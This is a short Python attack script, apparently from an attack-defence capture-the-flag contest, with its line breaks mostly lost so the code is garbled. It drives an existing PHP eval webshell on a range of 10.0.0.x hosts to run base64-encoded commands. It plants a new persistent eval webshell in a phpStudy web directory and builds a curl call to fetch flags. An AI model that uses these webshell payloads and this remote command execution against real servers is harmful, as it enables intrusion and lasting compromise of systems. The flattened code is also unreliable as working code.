import requests,base64,re
def get_flag(url,flag_url,method,passwd,flag_path): url="http://"+url+"/"+flag_path cmd = "curl"+flag_urlcmd = 'echo ^<^?php ^@eval(^$^_POST[\'aaa\'])^;^?^> > C://phpStudy//PHPTutorial//WWW//css//123//newshell.php'get_cmd = "echo system(\"%s\");"%cmddata={}data[passwd]="@eval(base64_decode($_POST[z0]));"data['z0']=base64.b64encode(bytes(get_cmd,encoding='utf-8'))if method == 'get':try:res=get_re(url)print(res.content)except:print("[-] %s connection_timeout"%url)return 0elif method == 'post':try:res = post_re(url,data)match = re.findall("\n\n",res.content)if match:with open('flag.txt','a+') as f:f.write(match)print(res.content)except:print("[-]%s connection_timeout" %url)return 0if res.status_code !=200:print("[-] %s webshell Not Found" %url)return 0else:print("[+] %s webshell is Found" %url)def get_re(url):res = requests.get(url=url,timeout=5)return resdef post_re(url,data):res =requests.post(url=url,data=data,timeout=5)return res
url = input("input your url:")
flag_url = input("input your flag_url:")
method = input("input your method:")
passwd = input("input your passwd:")
flag_path = input("input your flag_path:")for ip in range(117,120):ip = str(ip)url=url+ipget_flag(url,flag_url,method,passwd,flag_path)url ="10.0.0."